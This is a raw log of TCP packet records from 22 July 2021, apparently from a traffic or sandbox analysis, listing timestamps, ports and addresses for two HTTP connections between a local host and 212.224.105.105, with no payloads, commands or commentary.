Jul 22, 2021 11:44:11.951409101 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.951443911 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.951502085 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.951555014 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.951634884 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.951726913 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.951750994 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.951868057 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.951992989 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.952162981 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.952184916 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.952285051 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.952285051 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.952378035 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.952636957 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.952789068 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.953208923 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.953320026 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.953531981 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.953620911 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.953715086 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.953799963 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.953954935 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.954041004 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.954090118 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.954215050 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.986104965 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.986169100 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.986474991 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.986530066 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.986689091 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.994790077 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.994848967 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.994887114 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.994930029 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.994972944 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.995105982 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.995199919 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.995239019 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.995322943 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.995407104 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.995482922 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.995609999 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.995764971 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.995877028 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.996000051 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.996144056 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.996362925 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.996401072 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.996553898 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.996692896 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.996803999 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.996937990 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.997041941 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.997054100 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.997173071 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.997179985 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.997315884 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.997773886 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.997925997 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.998145103 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.998276949 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.998639107 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.998769045 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.999080896 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.999185085 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.999409914 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.999531984 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.999705076 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:11.999813080 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:11.999950886 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.000072002 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.000399113 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.000540972 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.000741005 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.000849962 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.001060009 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.001182079 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.001240969 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.001338005 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.001411915 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.001507044 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.001774073 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.001852036 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.001883984 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.002007961 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.002959013 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.002978086 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.003221989 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.003859043 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.003987074 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.004021883 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.004071951 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.004208088 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.004496098 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.004678965 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.004834890 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.004950047 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.004995108 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.005085945 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.005136967 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.005249977 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.005510092 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.005584955 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.005621910 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.005755901 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.005831003 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.005983114 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.006961107 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.007061005 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.007148027 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.007198095 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.007555962 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.007678032 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.007991076 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.008116961 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.008434057 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.008508921 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.008543015 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.008656979 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.008697987 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.008815050 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.008970022 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.009150028 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.033871889 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.033931017 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.033965111 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.033993959 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.034225941 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.034312963 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.035223961 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.035274982 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.035309076 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.035342932 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.035857916 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.044471979 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.044507027 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.044713974 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.044718981 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.044879913 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.044909000 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.044989109 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.045017004 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.045141935 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.045424938 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.045460939 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.045535088 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.045593977 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.045680046 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.045763016 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.045906067 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.045958042 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.046039104 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.046156883 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.046542883 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.046885967 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.047020912 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.047025919 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.047105074 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.047254086 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.047271013 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.047399998 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.047677040 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.047795057 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.048217058 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.048295021 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.048407078 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.048530102 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.048640966 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.049012899 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.049120903 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.049490929 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.049634933 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.049678087 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.049763918 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.049885035 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.049921989 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.049993038 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.050071955 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.050208092 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.050512075 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.050695896 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.051100969 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.051171064 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.051229000 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.051336050 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.052304029 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.052546024 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.053375006 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.053487062 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.053498983 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.053591013 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.053736925 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.053901911 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.054728031 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.054821968 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.055017948 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.055109978 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.055224895 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.055310965 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.055723906 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.055819035 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.056622982 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.056976080 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.057666063 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.058065891 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.058512926 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.058702946 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.058896065 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.059706926 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.060549974 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.060704947 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.061477900 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.061737061 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.062864065 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.063064098 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.063648939 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.064215899 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.064601898 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.065064907 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.065349102 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.065560102 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.065888882 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.066131115 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.066354036 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.066879034 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.067567110 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.068398952 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.068926096 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.068938971 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.069399118 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.070207119 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.070916891 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.071506023 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.071877956 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.071985960 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.072232008 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.072763920 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.072874069 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.073652029 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.074850082 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.082612991 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.082823038 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.083045959 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.083264112 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.083700895 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.083884954 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.084091902 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.084474087 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.084770918 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.085094929 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.085412979 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.092159033 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.092256069 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.092622042 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.093036890 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.093346119 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.093553066 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.093887091 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.094316959 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.094592094 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.094991922 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.095437050 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.095758915 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.095792055 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.096184015 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.096391916 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.096703053 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.096937895 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.097227097 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.097716093 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.098072052 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.098217964 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.098674059 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.098985910 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.099189997 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.099751949 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.099939108 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.100256920 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.100749969 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.101067066 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.101499081 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.101568937 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.102027893 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.102473974 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.102709055 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.102899075 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.103230953 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.103418112 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.103914976 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.104146004 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.104641914 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.104669094 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.105151892 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.105381966 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.105648041 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.105823994 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.106295109 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.106627941 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.107148886 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.107796907 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.108804941 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.109750032 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.109781027 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.109857082 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.110299110 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.110761881 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.111845970 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.112672091 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.112696886 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.113233089 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.113344908 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.113775969 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.114490986 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.114747047 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.114778042 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.114959955 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.285859108 CEST	80	49741	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.338149071 CEST	49741	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.415193081 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.464390039 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.464580059 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.465971947 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.515491962 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.515531063 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.516504049 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.564450026 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.564598083 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.564639091 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.564752102 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.605041981 CEST	80	49742	212.224.105.105	192.168.2.3
Jul 22, 2021 11:44:12.605175972 CEST	49742	80	192.168.2.3	212.224.105.105
Jul 22, 2021 11:44:12.611906052 CEST	80	49742	212.224.105.105	192.168.2.3
